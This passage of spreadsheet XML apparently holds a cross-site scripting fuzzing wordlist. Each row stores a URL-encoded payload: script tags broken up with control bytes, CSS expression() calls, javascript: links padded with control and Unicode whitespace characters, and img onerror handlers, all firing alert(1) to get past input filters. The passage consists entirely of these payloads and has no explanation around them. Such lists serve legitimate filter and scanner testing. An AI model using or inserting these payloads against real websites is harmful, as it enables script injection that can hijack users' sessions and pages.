        <v>%3Cscript%5Cx0Ctype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="3" t="s">
        <v>30</v>
      </c>
      <c r="B141" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx2Ftype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B142" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Atype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="3" t="s">
        <v>144</v>
      </c>
      <c r="B143" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%5Cx3Aexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="3" t="s">
        <v>145</v>
      </c>
      <c r="B144" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexpression%5Cx5C%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="3" t="s">
        <v>146</v>
      </c>
      <c r="B145" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexpression%5Cx00%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="3" t="s">
        <v>147</v>
      </c>
      <c r="B146" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexp%5Cx00ression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="3" t="s">
        <v>148</v>
      </c>
      <c r="B147" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3Aexp%5Cx5Cression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="3" t="s">
        <v>149</v>
      </c>
      <c r="B148" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Aexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="3" t="s">
        <v>150</v>
      </c>
      <c r="B149" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx09expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="3" t="s">
        <v>151</v>
      </c>
      <c r="B150" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE3%5Cx80%5Cx80expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="3" t="s">
        <v>152</v>
      </c>
      <c r="B151" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx84expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="3" t="s">
        <v>153</v>
      </c>
      <c r="B152" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxC2%5CxA0expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="3" t="s">
        <v>154</v>
      </c>
      <c r="B153" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx80expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="3" t="s">
        <v>155</v>
      </c>
      <c r="B154" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx8Aexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="3" t="s">
        <v>156</v>
      </c>
      <c r="B155" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Dexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="3" t="s">
        <v>157</v>
      </c>
      <c r="B156" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Cexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="3" t="s">
        <v>158</v>
      </c>
      <c r="B157" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx87expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="3" t="s">
        <v>159</v>
      </c>
      <c r="B158" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxEF%5CxBB%5CxBFexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="3" t="s">
        <v>160</v>
      </c>
      <c r="B159" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx20expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="3" t="s">
        <v>161</v>
      </c>
      <c r="B160" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx88expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="3" t="s">
        <v>162</v>
      </c>
      <c r="B161" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx00expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="3" t="s">
        <v>163</v>
      </c>
      <c r="B162" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx8Bexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="3" t="s">
        <v>164</v>
      </c>
      <c r="B163" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx86expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="3" t="s">
        <v>165</v>
      </c>
      <c r="B164" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx85expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="3" t="s">
        <v>166</v>
      </c>
      <c r="B165" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx82expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="3" t="s">
        <v>167</v>
      </c>
      <c r="B166" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5Cx0Bexpression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="3" t="s">
        <v>168</v>
      </c>
      <c r="B167" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx81expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="3" t="s">
        <v>169</v>
      </c>
      <c r="B168" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx83expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="3" t="s">
        <v>170</v>
      </c>
      <c r="B169" s="4" t="str">
        <f t="shared" si="1"/>
        <v>ABC%3Cdiv%20style%3D%22x%3A%5CxE2%5Cx80%5Cx89expression%28javascript%3Aalert%281%29%22%3EDEF</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="3" t="s">
        <v>171</v>
      </c>
      <c r="B170" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Bjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="3" t="s">
        <v>172</v>
      </c>
      <c r="B171" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Fjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="3" t="s">
        <v>173</v>
      </c>
      <c r="B172" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxC2%5CxA0javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="3" t="s">
        <v>174</v>
      </c>
      <c r="B173" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx05javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="3" t="s">
        <v>175</v>
      </c>
      <c r="B174" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE1%5CxA0%5Cx8Ejavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="3" t="s">
        <v>176</v>
      </c>
      <c r="B175" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx18javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="3" t="s">
        <v>177</v>
      </c>
      <c r="B176" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx11javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="3" t="s">
        <v>178</v>
      </c>
      <c r="B177" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx88javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="3" t="s">
        <v>179</v>
      </c>
      <c r="B178" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx89javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="3" t="s">
        <v>180</v>
      </c>
      <c r="B179" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx80javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="3" t="s">
        <v>181</v>
      </c>
      <c r="B180" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx17javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="3" t="s">
        <v>182</v>
      </c>
      <c r="B181" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx03javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="3" t="s">
        <v>183</v>
      </c>
      <c r="B182" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Ejavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="3" t="s">
        <v>184</v>
      </c>
      <c r="B183" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Ajavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="3" t="s">
        <v>185</v>
      </c>
      <c r="B184" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx00javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="3" t="s">
        <v>186</v>
      </c>
      <c r="B185" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx10javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="3" t="s">
        <v>187</v>
      </c>
      <c r="B186" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx82javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="3" t="s">
        <v>188</v>
      </c>
      <c r="B187" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx20javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="3" t="s">
        <v>189</v>
      </c>
      <c r="B188" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx13javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="3" t="s">
        <v>190</v>
      </c>
      <c r="B189" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx09javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="3" t="s">
        <v>191</v>
      </c>
      <c r="B190" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx8Ajavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="3" t="s">
        <v>192</v>
      </c>
      <c r="B191" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx14javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="3" t="s">
        <v>193</v>
      </c>
      <c r="B192" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx19javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="3" t="s">
        <v>194</v>
      </c>
      <c r="B193" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5CxAFjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="3" t="s">
        <v>195</v>
      </c>
      <c r="B194" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Fjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="3" t="s">
        <v>196</v>
      </c>
      <c r="B195" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx81javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="3" t="s">
        <v>197</v>
      </c>
      <c r="B196" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Djavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="3" t="s">
        <v>198</v>
      </c>
      <c r="B197" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx87javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="3" t="s">
        <v>199</v>
      </c>
      <c r="B198" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx07javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="3" t="s">
        <v>200</v>
      </c>
      <c r="B199" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE1%5Cx9A%5Cx80javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="3" t="s">
        <v>201</v>
      </c>
      <c r="B200" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx83javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="3" t="s">
        <v>202</v>
      </c>
      <c r="B201" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx04javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="3" t="s">
        <v>203</v>
      </c>
      <c r="B202" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx01javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="3" t="s">
        <v>204</v>
      </c>
      <c r="B203" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx08javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="3" t="s">
        <v>205</v>
      </c>
      <c r="B204" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx84javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="3" t="s">
        <v>206</v>
      </c>
      <c r="B205" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx86javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="3" t="s">
        <v>207</v>
      </c>
      <c r="B206" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE3%5Cx80%5Cx80javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="3" t="s">
        <v>208</v>
      </c>
      <c r="B207" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx12javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="3" t="s">
        <v>209</v>
      </c>
      <c r="B208" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Djavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="3" t="s">
        <v>210</v>
      </c>
      <c r="B209" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Ajavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="3" t="s">
        <v>211</v>
      </c>
      <c r="B210" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx0Cjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="3" t="s">
        <v>212</v>
      </c>
      <c r="B211" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx15javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="3" t="s">
        <v>213</v>
      </c>
      <c r="B212" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5CxA8javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="3" t="s">
        <v>214</v>
      </c>
      <c r="B213" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx16javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="3" t="s">
        <v>215</v>
      </c>
      <c r="B214" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx02javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="3" t="s">
        <v>216</v>
      </c>
      <c r="B215" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Bjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="3" t="s">
        <v>217</v>
      </c>
      <c r="B216" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx06javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="3" t="s">
        <v>218</v>
      </c>
      <c r="B217" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5CxA9javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="3" t="s">
        <v>219</v>
      </c>
      <c r="B218" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx85javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="3" t="s">
        <v>220</v>
      </c>
      <c r="B219" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Ejavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="3" t="s">
        <v>221</v>
      </c>
      <c r="B220" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx81%5Cx9Fjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="3" t="s">
        <v>222</v>
      </c>
      <c r="B221" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Cjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="3" t="s">
        <v>223</v>
      </c>
      <c r="B222" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx00%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="3" t="s">
        <v>224</v>
      </c>
      <c r="B223" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx3A%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="3" t="s">
        <v>225</v>
      </c>
      <c r="B224" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx09%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="3" t="s">
        <v>226</v>
      </c>
      <c r="B225" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx0D%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="3" t="s">
        <v>227</v>
      </c>
      <c r="B226" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx0A%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="3" t="s">
        <v>228</v>
      </c>
      <c r="B227" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Aonerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="3" t="s">
        <v>229</v>
      </c>
      <c r="B228" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx22onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="3" t="s">
        <v>230</v>
      </c>
      <c r="B229" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Bonerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="3" t="s">
        <v>231</v>
      </c>
      <c r="B230" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Donerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="3" t="s">
        <v>232</v>
      </c>
      <c r="B231" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx2Fonerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="3" t="s">
        <v>233</v>
      </c>
      <c r="B232" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx09onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="3" t="s">
        <v>234</v>
      </c>
